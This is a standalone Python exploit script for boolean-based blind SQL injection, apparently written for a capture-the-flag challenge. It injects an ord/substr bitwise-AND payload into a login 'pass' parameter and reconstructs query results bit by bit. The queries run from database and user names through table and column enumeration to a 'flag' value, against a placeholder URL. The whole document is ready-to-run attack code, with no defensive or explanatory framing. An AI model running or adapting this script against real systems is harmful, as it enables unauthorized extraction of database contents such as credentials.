sql injection blind by bit and

sqli_exp_bit_and.py

#!/usr/bin/env python3
import requests

client = requests.Session()
debug = False

def get(url, data, headers=None):
    if not headers:
        headers = {}
    headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'
    proxies = {'http':'http://127.0.0.1:8080'}
    r = None
    if debug:
        r = client.get(url, params=data, headers=headers, proxies=proxies)
    else:
        r = client.get(url, params=data, headers=headers)
    return r

def exp():
    query = "select user()"
    query = "select database()"
    query = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
    query = "select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='bool'"
    query = "select flag from flag limit 1"
    flag = ""
    for index in range(1, 40):
        print(index)
        guess = 0
        for bit in range(8):
            base = pow(2, bit)
            payload = "xx1' or (ord(substr((%s),%d,1))&%d)=0#"%(query, index, base)
            data = {'user':'user', 'pass':payload}
            r = get(url, data=data)
            # print(r.text)
            if "wrong" in r.text:
                guess += base
        flag += chr(guess)
        print(flag)

if __name__ == "__main__":
    url = "http://xxxx.com/x.php"
    exp()